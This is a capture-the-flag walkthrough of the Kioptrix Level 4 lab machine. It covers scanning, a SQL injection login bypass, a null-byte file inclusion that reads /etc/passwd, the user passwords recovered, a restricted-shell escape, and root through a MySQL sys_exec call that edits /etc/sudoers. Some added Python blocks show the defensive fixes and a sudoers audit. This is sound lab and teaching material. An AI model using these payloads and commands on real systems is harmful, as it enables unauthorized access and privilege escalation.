
VulnHub machine practice: Kioptrix Level 4

Finding the target

Running sudo arp-scan -l shows that the target's IP address is 192.168.80.19.

    kali@kali:~$ sudo arp-scan -l
    [sudo] password for kali:
    Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
    Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.80.1 00:50:56:c0:00:08 VMware, Inc.
    192.168.80.2 00:50:56:fc:96:a7 VMware, Inc.
    192.168.80.19 00:0c:29:c9:6f:5d VMware, Inc.
    192.168.80.254 00:50:56:f8:e1:4e VMware, Inc.

    4 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.9.7: 256 hosts scanned in 2.308 seconds (110.92 hosts/sec). 4 responded

Scanning with nmap

The nmap scan shows the target listening on these ports: 22 (SSH), 80 (HTTP), 139 (SMB) and 445 (SMB).

    kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.19
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 08:16 EST
    Nmap scan report for 192.168.80.19
    Host is up (0.00091s latency).
    Not shown: 566 closed ports, 430 filtered ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    | ssh-hostkey:
    | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
    |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    |_http-title: Site doesn't have a title (text/html).
    139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
    MAC Address: 00:0C:29:C9:6F:5D (VMware)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 10h29m59s, deviation: 3h32m08s, median: 7h59m58s
    |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    | OS: Unix (Samba 3.0.28a)
    | Computer name: Kioptrix4
    | NetBIOS computer name:
    | Domain name: localdomain
    | FQDN: Kioptrix4.localdomain
    |_ System time: 2020-02-26T16:17:07-05:00
    | smb-security-mode:
    | account_used: guest
    | authentication_level: user
    | challenge_response: supported
    |_ message_signing: disabled (dangerous, but default)
    |_smb2-time: Protocol negotiation failed (SMB2)

    TRACEROUTE
    HOP RTT ADDRESS
    1 0.91 ms 192.168.80.19

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 33.76 seconds

The login page is vulnerable to SQL injection

Browse to http://192.168.80.19/ to reach the site's login page.
Enter the username admin and the password ' or '1'='1. The message the page returns shows that the login form is vulnerable to SQL injection.
How the injection works:

  • The query the application runs:
    SELECT * FROM USERS WHERE username='admin' AND password='ENTERED_PASSWORD';
  • After injection the query becomes:
    SELECT * FROM USERS WHERE username='admin' AND password='' or '1'='1';
    Because '1'='1' is always true, the WHERE clause matches rows regardless of the password entered.
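To make the mechanism concrete, here is an added example (not code from the post or from the Kioptrix image) that rebuilds the checklogin.php query shape against an in-memory SQLite table and puts it beside a parameterized version; the member rows are constructed from the two accounts recovered later in the post, and SQLite quote-doubling stands in for mysql_real_escape_string.

```python
import sqlite3

# Constructed sample rows standing in for the target's "members" table.
SAMPLE_MEMBERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]


def make_db():
    """In-memory stand-in for the MySQL database that checklogin.php queries."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return db


def login_vulnerable(db, username, password):
    """Same query shape as checklogin.php: the username is escaped, the password
    is pasted straight into the SQL text. Returns the usernames of matching
    rows; a non-empty list means the login 'succeeded'."""
    safe_user = username.replace("'", "''")  # SQLite analogue of mysql_real_escape_string
    sql = (f"SELECT username FROM members WHERE username='{safe_user}' "
           f"and password='{password}' ORDER BY username")
    return [row[0] for row in db.execute(sql)]


def login_parameterized(db, username, password):
    """Hardened form: both values are bound parameters and never become SQL text,
    so ' or '1'='1 is compared literally against the stored password."""
    sql = "SELECT username FROM members WHERE username=? and password=? ORDER BY username"
    return [row[0] for row in db.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # the password the post types into the login form
    # AND binds tighter than OR, so the WHERE clause becomes
    # (username='admin' and password='') or ('1'='1'), which holds for every row.
    print("vulnerable:", login_vulnerable(db, "admin", payload))     # ['john', 'robert']
    print("hardened  :", login_parameterized(db, "admin", payload))  # []
```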

A file inclusion vulnerability exists

After logging in you land on http://192.168.80.19/member.php?username=. Now change the username value and compare what comes back:

  • username=.
  • username=/
  • username=/etc/passwd
  • username=/etc/networks
  • username=/proc/version

From these experiments we can infer that, given a username, the application includes the page username/username.php, and that the substring etc is stripped from the username before the path is built.

Exploiting the vulnerability

Using the behaviour just discovered, append a null byte (%00) to the username value. The null byte cuts the .php suffix off the included path, which is what would allow an arbitrary file, including a planted shell script, to be included.
Setting username to /proc/version%00 returns the target's kernel version: Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
Setting username to /etetcc/passwd%00 (the single-pass filter turns etetcc into etc) returns /etc/passwd, which lists the users loneferret, john and robert.
Setting username to loneferret, john and robert in turn shows that john and robert are the two regular users of the site.
Back on the login page, use john and then robert as the username with the injection string 1'or'1'='1 or 'or 1=1# as the password. This reveals john's password: MyNameIsJohn
robert's password: ADGAdsafdfwt4gadfga==
Note: after obtaining john's password, clear the browser cache before repeating the injection to get robert's password, or simply open a new private window and inject again there.
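The include behaviour inferred above, the single-pass etc filter and the %00 truncation, modelled in an added example (not the post's or the image's code; member.php's source is not shown in the post) next to a hardened resolver; WEB_ROOT and the name allowlist are assumptions.

```python
import os
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumed: the directory the post lists, holding john/ and robert/
NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # assumed allowlist for a member name


def naive_include_path(username):
    """Models the behaviour the post inferred for member.php: decode the
    parameter, strip the substring "etc" once, then include
    "<username>/<username>.php". A %00 survives URL-decoding as a NUL byte,
    and the C-level open() under PHP 5.2 stops reading the path there."""
    value = unquote(username).replace("etc", "", 1)
    # os.path.join discards WEB_ROOT when the value is absolute, which is how
    # the observed reads of /proc/version escaped the web root.
    path = os.path.join(WEB_ROOT, f"{value}/{value}.php")
    return path.split("\x00", 1)[0]


def safe_member_page(username):
    """Hardened resolver: decode once, reject NUL bytes and any name outside a
    strict allowlist, then confirm the resolved path is still under WEB_ROOT.
    Returns the path to include, or None to refuse the request."""
    value = unquote(username)
    if "\x00" in value or not NAME_RE.match(value):
        return None
    root = os.path.realpath(WEB_ROOT)
    candidate = os.path.realpath(os.path.join(root, value, f"{value}.php"))
    # Defence in depth: even if the allowlist were loosened, traversal cannot escape.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("john", "/proc/version%00", "/etetcc/passwd%00", "../index"):
        print(f"{probe:20} naive={naive_include_path(probe)!r} safe={safe_member_page(probe)!r}")
```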

Logging in to the target over SSH as john

SSH in as john: ssh john@192.168.80.19
    kali@kali:~$ ssh john@192.168.80.19
    The authenticity of host '192.168.80.19 (192.168.80.19)' can't be established.
    RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.80.19' (RSA) to the list of known hosts.
    john@192.168.80.19's password:
    Welcome to LigGoat Security Systems - We are Watching
    == Welcome LigGoat Employee ==
    LigGoat Shell is in place so you don't screw up
    Type '?' or 'help' to get the list of allowed commands
    john:~$
Type ? in the shell to list the commands it allows.
    john:~$ ?
    cd clear echo exit help ll lpath ls
Type echo os.system("/bin/bash") to break out of the restricted LigGoat shell into a full bash shell on the target.
    john:~$ echo os.system("/bin/bash")
    john@Kioptrix4:~$
Run ps aux|grep root to list the processes running as root:
    john@Kioptrix4:~$ ps aux|grep root 
    root 1 0.0 0.0 2844 1696 ? Ss Feb26 0:01 /sbin/init
    root 2 0.0 0.0 0 0 ? S< Feb26 0:00 [kthreadd]
    root 3 0.0 0.0 0 0 ? S< Feb26 0:00 [migration/0]
    root 4 0.0 0.0 0 0 ? S< Feb26 0:00 [ksoftirqd/0]
    root 5 0.0 0.0 0 0 ? S< Feb26 0:00 [watchdog/0]
    root 6 0.0 0.0 0 0 ? S< Feb26 0:00 [migration/1]
    root 7 0.0 0.0 0 0 ? S< Feb26 0:00 [ksoftirqd/1]
    root 8 0.0 0.0 0 0 ? S< Feb26 0:00 [watchdog/1]
    root 9 0.0 0.0 0 0 ? S< Feb26 0:00 [migration/2]
    root 10 0.0 0.0 0 0 ? S< Feb26 0:00 [ksoftirqd/2]
    root 11 0.0 0.0 0 0 ? S< Feb26 0:00 [watchdog/2]
    root 12 0.0 0.0 0 0 ? S< Feb26 0:00 [migration/3]
    root 13 0.0 0.0 0 0 ? S< Feb26 0:00 [ksoftirqd/3]
    root 14 0.0 0.0 0 0 ? S< Feb26 0:00 [watchdog/3]
    root 15 0.0 0.0 0 0 ? S< Feb26 0:00 [events/0]
    root 16 0.0 0.0 0 0 ? S< Feb26 0:00 [events/1]
    root 17 0.0 0.0 0 0 ? S< Feb26 0:00 [events/2]
    root 18 0.0 0.0 0 0 ? R< Feb26 0:00 [events/3]
    root 19 0.0 0.0 0 0 ? S< Feb26 0:00 [khelper]
    root 56 0.0 0.0 0 0 ? S< Feb26 0:00 [kblockd/0]
    root 57 0.0 0.0 0 0 ? S< Feb26 0:00 [kblockd/1]
    root 58 0.0 0.0 0 0 ? S< Feb26 0:00 [kblockd/2]
    root 59 0.0 0.0 0 0 ? S< Feb26 0:00 [kblockd/3]
    root 62 0.0 0.0 0 0 ? S< Feb26 0:00 [kacpid]
    root 63 0.0 0.0 0 0 ? S< Feb26 0:00 [kacpi_notify]
    root 195 0.0 0.0 0 0 ? S< Feb26 0:00 [kseriod]
    root 249 0.0 0.0 0 0 ? S Feb26 0:00 [pdflush]
    root 250 0.0 0.0 0 0 ? S Feb26 0:01 [pdflush]
    root 251 0.0 0.0 0 0 ? S< Feb26 0:00 [kswapd0]
    root 293 0.0 0.0 0 0 ? S< Feb26 0:00 [aio/0]
    root 294 0.0 0.0 0 0 ? S< Feb26 0:00 [aio/1]
    root 295 0.0 0.0 0 0 ? S< Feb26 0:00 [aio/2]
    root 296 0.0 0.0 0 0 ? S< Feb26 0:00 [aio/3]
    root 1552 0.0 0.0 0 0 ? S< Feb26 0:00 [ata/0]
    root 1555 0.0 0.0 0 0 ? S< Feb26 0:00 [ata/1]
    root 1557 0.0 0.0 0 0 ? S< Feb26 0:00 [ata/2]
    root 1561 0.0 0.0 0 0 ? S< Feb26 0:00 [ata/3]
    root 1563 0.0 0.0 0 0 ? S< Feb26 0:00 [ata_aux]
    root 1592 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_0]
    root 1593 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_1]
    root 1653 0.0 0.0 0 0 ? S< Feb26 0:00 [ksuspend_usbd]
    root 1658 0.0 0.0 0 0 ? S< Feb26 0:00 [khubd]
    root 2492 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_2]
    root 2633 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_3]
    root 2634 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_4]
    root 2635 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_5]
    root 2636 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_6]
    root 2637 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_7]
    root 2638 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_8]
    root 2639 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_9]
    root 2640 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_10]
    root 2641 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_11]
    root 2642 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_12]
    root 2643 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_13]
    root 2644 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_14]
    root 2645 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_15]
    root 2646 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_16]
    root 2647 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_17]
    root 2648 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_18]
    root 2649 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_19]
    root 2650 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_20]
    root 2651 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_21]
    root 2652 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_22]
    root 2653 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_23]
    root 2654 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_24]
    root 2655 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_25]
    root 2656 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_26]
    root 2657 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_27]
    root 2658 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_28]
    root 2659 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_29]
    root 2660 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_30]
    root 2661 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_31]
    root 2662 0.0 0.0 0 0 ? S< Feb26 0:00 [scsi_eh_32]
    root 2883 0.0 0.0 0 0 ? S< Feb26 0:00 [kjournald]
    root 3062 0.0 0.0 2236 724 ? S<s Feb26 0:00 /sbin/udevd --daemon
    root 3551 0.0 0.0 0 0 ? S< Feb26 0:00 [btaddconn]
    root 3552 0.0 0.0 0 0 ? S< Feb26 0:00 [btdelconn]
    root 3562 0.0 0.0 0 0 ? S< Feb26 0:00 [kgameportd]
    root 3757 0.0 0.0 0 0 ? S< Feb26 0:00 [kpsmoused]
    root 4968 0.0 0.0 1716 488 tty4 Ss+ Feb26 0:00 /sbin/getty 38400 tty4
    root 4969 0.0 0.0 1716 492 tty5 Ss+ Feb26 0:00 /sbin/getty 38400 tty5
    root 4973 0.0 0.0 1716 492 tty2 Ss+ Feb26 0:00 /sbin/getty 38400 tty2
    root 4976 0.0 0.0 1716 488 tty3 Ss+ Feb26 0:00 /sbin/getty 38400 tty3
    root 4977 0.0 0.0 1716 484 tty6 Ss+ Feb26 0:00 /sbin/getty 38400 tty6
    root 5036 0.0 0.0 1872 540 ? S Feb26 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/kl
    root 5057 0.0 0.0 5316 992 ? Ss Feb26 0:00 /usr/sbin/sshd
    root 5113 0.0 0.0 1772 524 ? S Feb26 0:00 /bin/sh /usr/bin/mysqld_safe
    root 5155 0.0 0.7 126988 16292 ? Sl Feb26 0:09 /usr/sbin/mysqld --basedir=/usr --datadir
    root 5156 0.0 0.0 1700 560 ? S Feb26 0:00 logger -p daemon.err -t mysqld_safe -i -t
    root 5240 0.0 0.0 6528 1352 ? Ss Feb26 0:00 /usr/sbin/nmbd -D
    root 5242 0.0 0.1 10108 2720 ? Ss Feb26 0:00 /usr/sbin/smbd -D
    root 5256 0.0 0.0 10108 1028 ? S Feb26 0:00 /usr/sbin/smbd -D
    root 5257 0.0 0.0 8084 1608 ? Ss Feb26 0:00 /usr/sbin/winbindd
    root 5280 0.0 0.0 8084 1160 ? S Feb26 0:00 /usr/sbin/winbindd
    root 5289 0.0 0.0 2104 888 ? Ss Feb26 0:00 /usr/sbin/cron
    root 5311 0.0 0.3 20464 6756 ? Ss Feb26 0:01 /usr/sbin/apache2 -k start
    root 5367 0.0 0.0 1716 492 tty1 Ss+ Feb26 0:00 /sbin/getty 38400 tty1
    root 5401 0.0 0.0 8084 868 ? S Feb26 0:00 /usr/sbin/winbindd
    root 5402 0.0 0.0 8092 1264 ? S Feb26 0:00 /usr/sbin/winbindd
    root 6546 0.0 0.1 11360 3720 ? Ss 08:38 0:00 sshd: john [priv]
    john 6599 0.0 0.0 3004 752 pts/0 R+ 08:45 0:00 grep root

Getting into the MySQL database

Listing /var/www on the target reveals the key file checklogin.php.
    john@Kioptrix4:~$ cd /var/www/
    john@Kioptrix4:/var/www$ ls
    checklogin.php database.sql images index.php john login_success.php logout.php member.php robert
    john@Kioptrix4:/var/www$ cat checklogin.php
    <?php
    ob_start();
    $host="localhost"; // Host name
    $username="root"; // Mysql username
    $password=""; // Mysql password
    $db_name="members"; // Database name
    $tbl_name="members"; // Table name

    // Connect to server and select databse.
    mysql_connect("$host", "$username", "$password")or die("cannot connect");
    mysql_select_db("$db_name")or die("cannot select DB");

    // Define $myusername and $mypassword
    $myusername=$_POST['myusername'];
    $mypassword=$_POST['mypassword'];

    // To protect MySQL injection (more detail about MySQL injection)
    $myusername = stripslashes($myusername);
    //$mypassword = stripslashes($mypassword);
    $myusername = mysql_real_escape_string($myusername);
    //$mypassword = mysql_real_escape_string($mypassword);

    //$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
    $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
    //$result=mysql_query($sql);

    // Mysql_num_row is counting table row
    $count=mysql_num_rows($result);
    // If result matched $myusername and $mypassword, table row must be 1 row

    if($count!=0){
    // Register $myusername, $mypassword and redirect to file "login_success.php"
    session_register("myusername");
    session_register("mypassword");
    header("location:login_success.php?username=$myusername");
    }
    else {
    echo "Wrong Username or Password";
    print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
    }

    ob_end_flush();
    ?>
checklogin.php shows that the MySQL root password is empty, so try logging in to MySQL.
    john@Kioptrix4:/var/www$ mysql -u root -p
    Enter password:
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 67
    Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql>
After logging in we can see that the target runs MySQL version 5.0.51a-3ubuntu5.4.

Privilege escalation

At the MySQL prompt run SELECT sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers"); to grant john full sudo rights. Then, from john's shell, run sudo bash and enter john's password to get a root shell.
Note: shell commands can be run from inside MySQL because the target has the lib_mysqludf_sys.so module installed (see the reference post at the end). Since mysqld itself runs as root (see the ps output above), anything sys_exec runs also runs as root, which is why a MySQL login with an empty password is enough to write to /etc/sudoers.
    root@Kioptrix4:/# whereis lib_mysqludf_sys.so
    lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
Running a shell command through MySQL's SELECT:
    mysql> SELECT sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers");
    +-------------------------------------------------------+
    | sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers") |
    +-------------------------------------------------------+
    | NULL |
    +-------------------------------------------------------+
    1 row in set (0.04 sec)

    mysql> Aborted
    john@Kioptrix4:/var/www$ sudo bash
    [sudo] password for john:
    root@Kioptrix4:/var/www# whoami
    root

What is /etc/sudoers

    root@Kioptrix4:/# cat /etc/sudoers 
    # /etc/sudoers
    #
    # This file MUST be edited with the 'visudo' command as root.
    #
    # See the man page for details on how to write a sudoers file.
    #

    Defaults env_reset

    # Host alias specification

    # User alias specification

    # Cmnd alias specification

    # User privilege specification
    root ALL=(ALL) ALL

    # Uncomment to allow members of group sudo to not need a password
    # (Note that later entries override this, so you might need to move
    # it further down)
    # %sudo ALL=NOPASSWD: ALL

    # Members of the admin group may gain root privileges
    %admin ALL=(ALL) ALL
    john ALL=(ALL) ALL # this is the line written from the MySQL command line; it grants john root privileges
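An added audit (not from the post) that would catch the sudoers line the sys_exec() call appended: it parses the user specifications of a sudoers file and reports any principal granted the ALL command that is not in an assumed baseline of root and %admin; the sample content is constructed from the listing above.

```python
import re

# Constructed sample: the target's /etc/sudoers as printed above, after the
# sys_exec() call appended the john line (comment lines kept to show they are ignored).
SAMPLE_SUDOERS = """\
Defaults env_reset
# User privilege specification
root ALL=(ALL) ALL
# %sudo ALL=NOPASSWD: ALL
%admin ALL=(ALL) ALL
john ALL=(ALL) ALL
"""

# Assumed baseline: principals that legitimately hold unrestricted sudo on this host.
EXPECTED_FULL_SUDO = {"root", "%admin"}

# User specification: <who> <host>=[(<runas>)] [TAG:]... <commands>
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
NON_SPEC = ("Defaults", "Host_Alias", "User_Alias", "Cmnd_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Return a list of user-specification dicts; comments, blank lines, Defaults
    and alias definitions are skipped (#include directives fall out as comments)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(NON_SPEC):
            continue
        m = SPEC_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def audit_full_sudo(text, expected=EXPECTED_FULL_SUDO):
    """Principals granted the ALL command (with or without NOPASSWD) that are
    not in the expected baseline; on the target this flags the line sys_exec wrote."""
    return sorted(
        e["who"] for e in parse_sudoers(text)
        if e["cmds"].strip() == "ALL" and e["who"] not in expected
    )


if __name__ == "__main__":
    print("unexpected full-sudo grants:", audit_full_sudo(SAMPLE_SUDOERS))  # ['john']
```

On the live host the companion check is whether a sys_exec function is registered at all, which the mysql.func table records.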

Reference post

https://nandtech.co/2017/07/16/penetration-testing-practice-hacking-kioptrix-l4/